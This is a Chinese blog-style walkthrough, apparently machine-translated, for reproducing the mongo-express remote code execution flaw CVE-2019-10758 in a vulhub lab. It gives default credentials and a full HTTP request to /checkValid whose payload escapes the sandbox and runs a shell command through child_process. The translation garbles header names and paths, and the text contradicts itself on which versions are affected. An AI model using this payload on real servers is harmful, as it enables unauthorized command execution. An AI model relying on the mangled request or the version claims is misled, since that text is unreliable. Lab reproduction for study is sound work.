这篇文章将为大家详细讲解有关如何进行MongoDB mongo-express远程代码执行,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
<强>漏洞简介:强>
此软件包的受影响版本容易受到使用记者方法的端点通过远程执行代码(远端控制设备)攻击的攻击。在非安全环境中滥用vm依赖关系来执行exec命令。默认用户名是管理员,密码是通过。
<强>威胁类型强>
远程代码执行
<强>威胁等级强>
高
<强>漏洞编号强>
cve - 2019 - 10758
<强>受影响系统及应用版本强>
mongo-express,版本0.54.0及更低版本
<强>不受影响的版本强>
mongo-express 0.54.0或更高版本。
<强>漏洞复现:强>
这个漏洞环境感觉vulhub的就可以满足,所以选择搭建vulhub的环境
vulhub下载
<>之前,git clone https://github.com.cnpmjs.org/vulhub/vulhub这里还有个<强>小福利>强,有没有觉得经常git克隆的时候特别慢?几K,十几K的下载?
为了解决这个问题,尝试了好多方法,总结了一个最有效的方法
git克隆的时候在<强>把https://github.com换成:https://github.com.cnpmjs.org/强>
这是一个国内的github镜像站,下载速度,怎么说呢,起飞! <强>
强>
安装码头工人(我之前安装过)<强> 强>
安装docker-compose
pip install docker-compose
<强> 强>
启用码头工人,拉取镜,像启动环境
<强> p 强>:这就又要说一个<强>福利>强了,码头工人拉的时候有没有感觉很慢?放着阿里这么大的靠山得用起来呀
, https://cr.console.aliyun.com//加速器
登录阿里云进去,左下角有个码头工人镜像加速,按步骤来,然后……起飞! !
(都是一个坑一个坑摸出来的……)
至此环境搭建成功!
<强>环境启动后,访问http://192.168.192.128:8081即可查看到Web页面。强>
<强>攻击复现:强>
直接发送如下数据包,即可执行代码
POST /checkValid HTTP/1.1 主持人:你的ip 接受编码:gzip、缩小 接受:*/* 接收语言:en 用户代理:Mozilla/5.0,(兼容;,MSIE 9.0;, Windows NT 6.1;, Win64;, x64;,三叉戟/5.0) 连接:紧密 授权:Basic YWRtaW46cGFzcw==内容类型:应用程序/x-www-form-urlencoded 内容长度:124 , 文档=this.constructor.constructor (“return process") () .mainModule.require (“child_process") .execSync (“touch /tmp/success")
<强> Poc 强> <强>目标:在/tcp下创建成功文件强>
<强>发送数据包后访问,,http://localhost: 8081 强>
<强>查看是否创建成功:强>
docker-compose exec web ls /tmp
关于如何进行MongoDB mongo-express远程代码执行就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看的到。